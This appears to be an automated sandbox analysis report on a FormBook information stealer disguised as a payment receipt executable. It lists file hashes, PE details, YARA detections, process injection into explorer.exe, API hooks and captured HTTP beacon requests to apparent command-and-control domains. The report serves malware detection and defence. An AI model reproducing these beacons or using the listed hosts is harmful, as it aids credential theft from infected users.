                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.806563272516785
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:Final-Payment-Receipt.exe
                                              File size:552448
                                              MD5:8f5d29001a9f5d4f62b47af6442be5ab
                                              SHA1:4838464ffe421aad7c9d73ba19420b7e9c2c427d
                                              SHA256:8e01fb320ffa60c0157bfc9aa8c6de43a7802d7f408de907a0d6338ce25c239c
                                              SHA512:8457a4d90e4777439aa5415d656535a6701428919981885ffd2a9fd82b7be8f0e5dff2d206f74aadef358b5988fc805e910f5da18d99f681efde918d2ed93302
                                              SSDEEP:12288:FE2YwhOTAtvmsADL5L3cAHczt8W+GKOfbn78g:FXD8ktmsMLMBPj78g
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P..d............... ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x4882da
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x5FB5D6C8 [Thu Nov 19 02:22:00 2020 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x882880x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x8a0000x59c.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x862e00x86400False0.871959380819data7.8171947974IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc0x8a0000x59c0x600False0.419270833333data4.06876160117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x8c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_VERSION0x8a0900x30cdata
                                              RT_MANIFEST0x8a3ac0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Version Infos

                                              DescriptionData
                                              Translation0x0000 0x04b0
                                              LegalCopyrightCopyright 2014
                                              Assembly Version1.0.0.0
                                              InternalNameF5NI.exe
                                              FileVersion1.0.0.0
                                              CompanyName
                                              LegalTrademarks
                                              Comments
                                              ProductNameBlackjack
                                              ProductVersion1.0.0.0
                                              FileDescriptionBlackjack
                                              OriginalFilenameF5NI.exe

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 19, 2020 22:20:26.977325916 CET4973080192.168.2.5162.0.236.49
                                              Nov 19, 2020 22:20:27.148660898 CET8049730162.0.236.49192.168.2.5
                                              Nov 19, 2020 22:20:27.148916006 CET4973080192.168.2.5162.0.236.49
                                              Nov 19, 2020 22:20:27.149298906 CET4973080192.168.2.5162.0.236.49
                                              Nov 19, 2020 22:20:27.322042942 CET8049730162.0.236.49192.168.2.5
                                              Nov 19, 2020 22:20:27.391788006 CET8049730162.0.236.49192.168.2.5
                                              Nov 19, 2020 22:20:27.391809940 CET8049730162.0.236.49192.168.2.5
                                              Nov 19, 2020 22:20:27.392299891 CET4973080192.168.2.5162.0.236.49
                                              Nov 19, 2020 22:20:27.392466068 CET4973080192.168.2.5162.0.236.49
                                              Nov 19, 2020 22:20:27.564534903 CET8049730162.0.236.49192.168.2.5
                                              Nov 19, 2020 22:20:47.666982889 CET4973180192.168.2.527.123.27.33
                                              Nov 19, 2020 22:20:47.953485966 CET804973127.123.27.33192.168.2.5
                                              Nov 19, 2020 22:20:47.953649044 CET4973180192.168.2.527.123.27.33
                                              Nov 19, 2020 22:20:47.953753948 CET4973180192.168.2.527.123.27.33
                                              Nov 19, 2020 22:20:48.240211010 CET804973127.123.27.33192.168.2.5
                                              Nov 19, 2020 22:20:48.246388912 CET804973127.123.27.33192.168.2.5
                                              Nov 19, 2020 22:20:48.246455908 CET804973127.123.27.33192.168.2.5
                                              Nov 19, 2020 22:20:48.246592045 CET4973180192.168.2.527.123.27.33
                                              Nov 19, 2020 22:20:48.246659994 CET4973180192.168.2.527.123.27.33
                                              Nov 19, 2020 22:20:48.533060074 CET804973127.123.27.33192.168.2.5
                                              Nov 19, 2020 22:21:28.858830929 CET4973380192.168.2.5192.0.78.230
                                              Nov 19, 2020 22:21:28.875322104 CET8049733192.0.78.230192.168.2.5
                                              Nov 19, 2020 22:21:28.875430107 CET4973380192.168.2.5192.0.78.230
                                              Nov 19, 2020 22:21:28.875543118 CET4973380192.168.2.5192.0.78.230
                                              Nov 19, 2020 22:21:28.891885996 CET8049733192.0.78.230192.168.2.5
                                              Nov 19, 2020 22:21:28.891923904 CET8049733192.0.78.230192.168.2.5
                                              Nov 19, 2020 22:21:28.891963005 CET8049733192.0.78.230192.168.2.5
                                              Nov 19, 2020 22:21:28.892087936 CET4973380192.168.2.5192.0.78.230
                                              Nov 19, 2020 22:21:28.892112970 CET4973380192.168.2.5192.0.78.230
                                              Nov 19, 2020 22:21:28.908574104 CET8049733192.0.78.230192.168.2.5

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 19, 2020 22:19:48.428203106 CET6015153192.168.2.58.8.8.8
                                              Nov 19, 2020 22:19:48.464210033 CET53601518.8.8.8192.168.2.5
                                              Nov 19, 2020 22:19:48.984335899 CET5696953192.168.2.58.8.8.8
                                              Nov 19, 2020 22:19:49.011492014 CET53569698.8.8.8192.168.2.5
                                              Nov 19, 2020 22:19:53.932404995 CET5516153192.168.2.58.8.8.8
                                              Nov 19, 2020 22:19:53.959470987 CET53551618.8.8.8192.168.2.5
                                              Nov 19, 2020 22:19:54.611696005 CET5475753192.168.2.58.8.8.8
                                              Nov 19, 2020 22:19:54.638799906 CET53547578.8.8.8192.168.2.5
                                              Nov 19, 2020 22:19:55.486553907 CET4999253192.168.2.58.8.8.8
                                              Nov 19, 2020 22:19:55.522375107 CET53499928.8.8.8192.168.2.5
                                              Nov 19, 2020 22:19:56.195149899 CET6007553192.168.2.58.8.8.8
                                              Nov 19, 2020 22:19:56.222517014 CET53600758.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:09.431056976 CET5501653192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:09.474910021 CET53550168.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:13.863044024 CET6434553192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:13.898453951 CET53643458.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:13.982206106 CET5712853192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:14.009272099 CET53571288.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:15.341979980 CET5479153192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:15.368985891 CET53547918.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:17.573630095 CET5046353192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:17.624994993 CET53504638.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:18.258366108 CET5039453192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:18.300740004 CET53503948.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:26.929465055 CET5853053192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:26.968744040 CET53585308.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:47.608442068 CET5381353192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:47.664834976 CET53538138.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:49.144931078 CET6373253192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:49.172059059 CET53637328.8.8.8192.168.2.5
                                              Nov 19, 2020 22:21:08.422624111 CET5734453192.168.2.58.8.8.8
                                              Nov 19, 2020 22:21:08.462667942 CET53573448.8.8.8192.168.2.5
                                              Nov 19, 2020 22:21:28.816133976 CET5445053192.168.2.58.8.8.8
                                              Nov 19, 2020 22:21:28.857445955 CET53544508.8.8.8192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Nov 19, 2020 22:20:17.573630095 CET192.168.2.58.8.8.80xc1b0Standard query (0)g.msn.comA (IP address)IN (0x0001)
                                              Nov 19, 2020 22:20:26.929465055 CET192.168.2.58.8.8.80x34c1Standard query (0)www.wacrox.comA (IP address)IN (0x0001)
                                              Nov 19, 2020 22:20:47.608442068 CET192.168.2.58.8.8.80x15ecStandard query (0)www.trumpingitagain.comA (IP address)IN (0x0001)
                                              Nov 19, 2020 22:21:08.422624111 CET192.168.2.58.8.8.80x4070Standard query (0)www.azarblock.comA (IP address)IN (0x0001)
                                              Nov 19, 2020 22:21:28.816133976 CET192.168.2.58.8.8.80x82a5Standard query (0)www.themindofafunnygirl.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Nov 19, 2020 22:20:17.624994993 CET8.8.8.8192.168.2.50xc1b0No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                              Nov 19, 2020 22:20:26.968744040 CET8.8.8.8192.168.2.50x34c1No error (0)www.wacrox.com162.0.236.49A (IP address)IN (0x0001)
                                              Nov 19, 2020 22:20:47.664834976 CET8.8.8.8192.168.2.50x15ecNo error (0)www.trumpingitagain.comtrumpingitagain.comCNAME (Canonical name)IN (0x0001)
                                              Nov 19, 2020 22:20:47.664834976 CET8.8.8.8192.168.2.50x15ecNo error (0)trumpingitagain.com27.123.27.33A (IP address)IN (0x0001)
                                              Nov 19, 2020 22:21:08.462667942 CET8.8.8.8192.168.2.50x4070Name error (3)www.azarblock.comnonenoneA (IP address)IN (0x0001)
                                              Nov 19, 2020 22:21:28.857445955 CET8.8.8.8192.168.2.50x82a5No error (0)www.themindofafunnygirl.comthemindofafunnygirl.comCNAME (Canonical name)IN (0x0001)
                                              Nov 19, 2020 22:21:28.857445955 CET8.8.8.8192.168.2.50x82a5No error (0)themindofafunnygirl.com192.0.78.230A (IP address)IN (0x0001)
                                              Nov 19, 2020 22:21:28.857445955 CET8.8.8.8192.168.2.50x82a5No error (0)themindofafunnygirl.com192.0.78.148A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.wacrox.com
                                              • www.trumpingitagain.com
                                              • www.themindofafunnygirl.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.549730162.0.236.4980C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 19, 2020 22:20:27.149298906 CET5719OUTGET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1
                                              Host: www.wacrox.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 19, 2020 22:20:27.391788006 CET5720INHTTP/1.1 404 Not Found
                                              Date: Thu, 19 Nov 2020 21:20:27 GMT
                                              Server: Apache/2.4.29 (Ubuntu)
                                              Content-Length: 327
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 31 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /71m/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.54973127.123.27.3380C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 19, 2020 22:20:47.953753948 CET5721OUTGET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1
                                              Host: www.trumpingitagain.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 19, 2020 22:20:48.246388912 CET5721INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 19 Nov 2020 21:20:48 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.549733192.0.78.23080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 19, 2020 22:21:28.875543118 CET5733OUTGET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1
                                              Host: www.themindofafunnygirl.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 19, 2020 22:21:28.891923904 CET5733INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Thu, 19 Nov 2020 21:21:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr
                                              X-ac: 2.hhn
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEE
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEE
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEE
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEE

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: Final-Payment-Receipt.exe PID: 1692 Parent PID: 5576

                                              General

                                              Start time:22:19:28
                                              Start date:19/11/2020
                                              Path:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
                                              Imagebase:0x10000
                                              File size:552448 bytes
                                              MD5 hash:8F5D29001A9F5D4F62B47AF6442BE5AB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: Final-Payment-Receipt.exe PID: 5764 Parent PID: 1692

                                              General

                                              Start time:22:19:31
                                              Start date:19/11/2020
                                              Path:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              Imagebase:0x8d0000
                                              File size:552448 bytes
                                              MD5 hash:8F5D29001A9F5D4F62B47AF6442BE5AB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: explorer.exe PID: 3472 Parent PID: 5764

                                              General

                                              Start time:22:19:33
                                              Start date:19/11/2020
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff693d90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: wlanext.exe PID: 4732 Parent PID: 3472

                                              General

                                              Start time:22:19:41
                                              Start date:19/11/2020
                                              Path:C:\Windows\SysWOW64\wlanext.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\wlanext.exe
                                              Imagebase:0xe10000
                                              File size:78848 bytes
                                              MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Author: Joe Security
